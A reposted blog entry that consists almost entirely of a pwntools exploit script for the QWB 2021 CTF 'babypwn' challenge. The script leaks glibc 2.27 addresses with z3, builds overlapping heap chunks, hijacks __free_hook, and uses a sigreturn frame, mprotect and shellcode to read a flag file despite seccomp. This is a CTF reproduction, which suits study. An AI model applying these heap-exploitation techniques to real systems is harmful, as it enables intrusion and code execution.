标签:index 32 pwn 复现 str sendlineafter qwb2021 2.27 def
babypwn
exp
from pwn import *
from z3 import *
context.log_level='debug'
p=process(["/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/ld-2.27.so","./babypwn"],env={'LD_PRELOAD':'/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so:./libseccomp.so.2'})
#p=process('./babypwn')
def add(size):
p.sendlineafter('>>> \n','1')
p.sendlineafter('size:\n',str(size))
def edit(index,content):
p.sendlineafter('>>> \n','3')
p.sendlineafter('index:\n',str(index))
p.sendlineafter('content:\n',content)
def free(index):
p.sendlineafter('>>> \n','2')
p.sendlineafter('index:\n',str(index))
def show(index):
p.sendlineafter('>>> \n','4')
p.sendlineafter('index:\n',str(index))
def solve(target):
a1=BitVec('a1',32)
x=a1
for _ in range(2):
x^= (32*x)^LShR((x^(32*x)),17)^(((32*x)^x^LShR((x^(32*x)),17))<<13)
s=Solver()
s.add(x==target)
assert s.check()==sat
return (s.model()[a1].as_long())
#leak libc_base
add(0x1f0)
add(0x200)
for i in range(2,9):
add(0x1f0)
#pause()
for i in range(2,9):
free(i)
free(0)
for i in range(7):
add(0x1f0)
print i
#pause()
if i!=5:
edit(i,(p64(0)+p64(0x21))*0x18)
add(0xa0)
show(8)
libc=ELF('/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
tmp1=solve(int('0x'+p.recvline(keepends=False),16))
tmp2=solve(int('0x'+p.recvline(keepends=False),16))
addr=(tmp2<<32)+tmp1
print hex(addr)
base=addr-0x3ebe90
libc.address=base
#leak heap_base
add(0x140)
free(8)
free(9)
show(5)
tmp1=solve(int('0x'+p.recvline(keepends=False),16))
tmp2=solve(int('0x'+p.recvline(keepends=False),16))
addr=(tmp2<<32)+tmp1
print hex(addr)
heapbase=addr-0x12c0
gdb.attach(p)
add(0xa0)#8
add(0x148)#9
addr=heapbase+0xcb0
edit(9,'a'*0x148)
pause()
py=p64(addr)*2
py=py.ljust(0x140,'a')+p64(0x150+0xa0)
edit(9,py)
edit(8,p64(0)+p64(0x1f0)+p64(addr)*2)
edit(1,'a'*0x1f0+p64(0)+p64(0x251))
pause()
add(0x1f0)
pause()
free(0)
for i in range(2,8):
free(i)
pause()
free(1)#overlap
free_hook=libc.sym['__free_hook']
system=libc.sym['system']
setcontext=libc.sym['setcontext']+53
mprotect=libc.sym['mprotect']
pause()
add(0x120)#0
add(0x140)#1
pause()
free(1)
free(9)
pause()
edit(0,'./flag\x00\x00'+'a'*152+p64(free_hook))#fastbin_attack
pause()
add(0x140)#1
add(0x140)#2
pause()
context.arch='amd64'
sig=SigreturnFrame()
sig.rsp=free_hook+0x10
sig.rbp=sig.rsp
sig.rip=mprotect
sig.rdi=free_hook&0xfffffffffffff000
sig.rsi=0x1000
sig.rdx=7
sig.csgsfs=0x2b000000000033
edit(0,str(sig))
pause()
shellcode='''
mov rax,2
mov rdi,{sh}
mov rsi,0
syscall
xor rax,rax
mov rdi,3
mov rsi,{bss1}
mov rdx,0x300
syscall
mov rax,1
mov rdi,1
mov rsi,{bss2}
mov rdx,0x100
syscall
'''.format(sh=free_hook+0x78,bss1=free_hook-0x500,bss2=free_hook-0x500)
shellcode=asm(shellcode)
py=p64(setcontext)+'flag\x00\x00\x00\x00'+p64(free_hook+0x18)+shellcode
py+=py.ljust(0x100,'\x90')
py+="flag\x00\x00\x00\x00"
edit(2,py)
pause()
free(0)
p.interactive()
标签:index,32,pwn,复现,str,sendlineafter,qwb2021,2.27,def 来源: https://www.cnblogs.com/mio-yy/p/15120426.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。